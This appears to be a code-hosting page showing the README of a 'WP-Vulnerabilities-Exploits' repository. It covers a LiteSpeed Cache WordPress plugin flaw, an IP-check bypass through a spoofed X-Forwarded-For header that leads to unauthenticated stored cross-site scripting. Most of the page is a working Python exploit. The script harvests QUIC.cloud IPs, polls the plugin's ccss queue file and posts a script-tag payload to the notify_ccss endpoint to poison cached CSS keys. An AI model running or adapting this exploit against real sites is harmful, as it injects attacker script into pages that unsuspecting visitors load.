crash.software
Projects
Pull Requests
Issues
Builds
WP-Vulnerabilities-Exploits
Code
Files
Commits
Branches
Tags
Pull Requests
Code Comments
Code Compare
Issues
Builds
Statistics
Child Projects
cra.sh
RESTful API
Projects STRLCPY WP-Vulnerabilities-Exploits Files
🤬
main
..
README.md Loading last commit info...
README.md

LiteSpeed Cache < 4.4.4 - IP Check Bypass to Unauthenticated Stored XSS

Description

The plugin does not properly verify that requests are coming from QUIC.cloud servers, allowing attackers to make requests to certain endpoints by using a specific X-Forwarded-For header value. In addition, one of the endpoint could be used to set CSS code if a setting is enabled, which will then be output in some pages without being sanitised and escaped. Combining those two issues, an unauthenticated attacker could put Cross-Site Scripting payloads in pages visited by users.

Proof of Concept

The "Load CSS Asynchronously" setting in the Page Optimization (/wp-admin/admin.php?page=litespeed-page_optm) needs to be turned on for this to work



#!/bin/python3

import requests

import json



def get_whitelist_ips():

    return requests.get("https://quic.cloud/ips", verify=False).text



print("[+] Getting the whitelisted ips...")



whitelist_ip = get_whitelist_ips().split("<br />")[0]



print(f"[+] Using {whitelist_ip}")



payload = "</style><script>alert(/XSS-cache/);</script>"

site = "https://example.com"



def poison(poison_keys, whitelist_ip):

    for poison_key in poison_keys:

        obj = {

        "status": "done",

        "data": {}

        }

        obj['data'][poison_key] = payload

        res = requests.post(f"{site}/wp-json/litespeed/v1/notify_ccss", data=json.dumps(obj), headers={"X-Forwarded-For": whitelist_ip}, verify=False).json()

        if res['count'] == 1:

            print(f"We have successfully poisoned the {poison_key} key!")

        else:

            print(f"Failed to poison the {poison_key} key")





def get_keys_from_ccss(res):

    obj = json.loads(res)

    return [key for key in obj.keys() if "litespeed_conf.dat" not in obj[key]['url']]



while True:

    res = requests.get(f"{site}/wp-content/litespeed/ccss/.litespeed_conf.dat", verify=False).text

    #print("Waiting for ccss queue file to show up...")

    if '","user_agent":"' in res:

        #print(res)

        poison_keys = get_keys_from_ccss(res)

        poison(poison_keys, whitelist_ip)

References

https://wpscan.com/vulnerability/e9966b3e-2eb9-4d70-8c18-6a829b4827cc

Please wait...
Page is in error, reload to recover